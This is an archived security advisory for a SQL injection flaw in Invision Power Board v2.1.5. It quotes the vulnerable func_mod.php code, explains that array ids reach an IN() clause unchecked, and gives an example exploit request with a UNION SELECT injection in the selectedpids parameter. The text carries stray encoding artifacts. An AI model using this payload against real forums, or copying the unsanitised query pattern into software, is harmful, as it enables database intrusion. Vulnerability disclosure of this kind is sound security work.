Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: Frequently Exploited :: b06-1948.htm

Invision Power Board v2.1.5 Remote SQL Injection



Invision Power Board v2.1.5 Remote SQL Injection
Invision Power Board v2.1.5 Remote SQL Injection



Invision Power Board v2.1.5 Remote SQL Injection=0D
=0D
Filename		:- func_mod.php=0D
Functionname	:- post_delete()=0D
Lines			:- 89 To 209=0D
=0D
Bug Found By :- Devil-00=0D
=0D
	Greetz :-=0D
    		Rock Master ^ Hackers Pal ^ n0m4rcy ^=0D
www.securtygurus.net=0D 
=0D
[Code]=0D
=0D
		if ( is_array( $id ) )=0D
		{=0D
			if ( count($id) > 0 )=0D
			{=0D
				$pid = " IN(".implode(",",$id).")";=0D
			}=0D
			else=0D
			{=0D
				return FALSE;=0D
			}=0D
		}=0D
		else=0D
		{=0D
			if ( intval($id) )=0D
			{=0D
				$pid   = "=$id";=0D
			}=0D
			else=0D
			{=0D
				return FALSE;=0D
			}=0D
		}=0D
=0D
[/CODE]=0D
=0D
When $id = array .. the code don't check it if ( INTVAL )=0D
=0D
[CODE]=0D
if ( count($id) > 0 )=0D
			{=0D
				$pid = " IN(".implode(",",$id).")";=0D
			}=0D
[/CODE]=0D
=0D
Then We Can Do SQL Injection  Here >>=0D
=0D
[CODE]=0D
$this->ipsclass->DB->simple_construct( array( 'select' => 'pid, topic_id', 'from' => 'posts', 'where' => 'pid'.$pid ) );=0D
[/CODE]=0D
=0D
And Here >>=0D
=0D
[CODE]=0D
$this->ipsclass->DB->simple_construct( array( 'select' => '*', 'from' => 'attachments', 'where' => "attach_pid".$pid ) );=0D
[/CODE]=0D
=0D
Cuz We Have 2 Querys With diffiernt Tabels Number We Can't Use UNION To Exploit :( Baaad :(=0D
=0D
Exm. To Exploit=0D
=0D
	1- First Add 2 Post=0D
    2- Check It To Delete=0D
    	3- Edit String Query By HTTPLiveHeader=0D
=0D
[CODE]=0D
act=mod&auth_key=2b71da21cbacba35ccf6fc04fe807d9a&st=0&selectedpids=-1) UNION SELECT 1,3/*&tact=delete=0D
[/CODE]=0D
=0D


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH